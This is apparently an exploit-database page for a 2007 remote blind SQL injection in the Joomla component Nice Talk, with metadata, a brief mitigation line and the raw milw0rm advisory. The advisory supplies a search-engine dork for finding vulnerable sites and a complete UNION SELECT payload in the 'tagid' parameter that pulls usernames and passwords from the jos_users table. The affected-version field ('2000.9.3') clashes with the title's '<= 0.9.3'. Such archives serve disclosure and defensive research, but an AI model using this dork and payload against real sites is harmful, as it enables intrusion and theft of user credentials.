header-logo
Suggest Exploit
vendor:
Nice Talk
by:
ajann
7.5
CVSS
HIGH
Remote Blind SQL Injection
89
CWE
Product Name: Nice Talk
Affected Version From: 2000.9.3
Affected Version To: 2000.9.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla Component Nice Talk <= 0.9.3 (tagid) Remote Blind SQL Injection Vulnerability

This exploit allows an attacker to perform a blind SQL injection attack in the Joomla Component Nice Talk version 0.9.3 or earlier. By injecting malicious SQL code into the 'tagid' parameter of the component, an attacker can retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Joomla Component Nice Talk.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Joomla Component Nice Talk <= 0.9.3 (tagid) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.azrul.com
# $$      :  ??
# Dork    :  inurl:index.php?option=com_nicetalk
# DorkEx  :  http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_nicetalk&hl=tr&start=0&sa=N

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?option=com_nicetalk&tagid=[SQL Inject]

Example:

//index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]